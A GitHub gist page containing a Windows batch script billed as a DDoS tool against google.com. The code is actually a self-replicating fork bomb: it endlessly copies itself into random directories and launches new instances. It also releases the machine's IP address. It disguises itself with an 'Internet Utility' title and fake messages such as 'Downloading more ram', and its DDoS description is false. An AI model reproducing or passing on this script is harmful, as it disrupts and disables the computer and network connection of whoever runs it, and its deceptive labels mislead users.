Skip to content

Instantly share code, notes, and snippets.

@Announcement
Created July 24, 2014 02:19
Show Gist options
  • Select an option

  • Save Announcement/f89bed7291144ab95aef to your computer and use it in GitHub Desktop.

Select an option

Save Announcement/f89bed7291144ab95aef to your computer and use it in GitHub Desktop.
SET WEBSITE = google.com
:BeginDdos
echo What it does:
echo pings localhost for nearest working internet connection
echo releases their ip address
echo throws all of the activity on the network at the website
echo Renews your internet activity to work again
echo repeats if needed
cls
:Trial
SET X=%RANDOM%
mkdir %X%
copy hacking.bat %X%
cd %X%
title Internet Utility
echo Searching for nearest service provider...
echo Downloading more ram...
start hacking
ping localhost > nul
ipconfig /release > nul
echo Reconnecting to internet
ping localhost -n 1000 >nul
ping %WEBSITE%
ipconfig /renew
echo Test to see if working
ping localhost -n 3 > nul
color 9f
cls
ping localhost -n 3
goto :Trial
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment